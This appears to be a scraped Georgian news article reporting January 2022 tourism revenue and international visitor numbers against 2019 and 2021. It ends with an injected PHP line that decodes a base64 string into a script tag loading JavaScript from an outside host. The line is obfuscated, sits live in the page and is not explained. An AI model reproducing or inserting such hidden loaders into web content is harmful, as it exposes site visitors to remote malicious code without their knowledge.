celsiusi
ავერსი საქკაბელი
ტურიზმის ეროვნული ადმინისტრაციის ცნობით, იანვრის თვეში  მოგზაურობიდან მიღებულმა შემოსავალმა 114,022,899 აშშ. დოლარი შეადგინა, რაც 2019 წლის მაჩვენებლის 69.3%  აღდგენაა.  
 
2021 წლის იანვრის თვესთან  შედარებით კი მოგზაურობიდან შემოსავლები გაზრდილია 103,663,879 (+1,007%)  აშშ დოლარით.
 
"2022 წლის იანვარში საქართველოში 199,393 საერთაშორისო მოგზაურის ვიზიტი შედგა, რაც 2019 წლის მონაცემთან შედარებით 38%-იანი აღდგენაა.
 
2021 წელთან შედარებით კი, ზრდა +471%-ს შეადგენს. 2022 წლის იანვარში საერთაშორისო ტურისტული ვიზიტების რაოდენობამ 163,615 შეადგინა.
 
აღდგენა 2019 წლის მონაცემთან შედარებით 53%-ია, ხოლო 2021 წელთან შედარებით ზრდა +456%-ს შეადგენს," - აღნიშნულია ტურიზმის ადმინისტრაციის ინფორმაციაში.
 
უწყების ცნობით, ვიზიტორების კუთხით 2022 წელს პოზიტური ტენდენცია ნარჩუნება.
1174
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");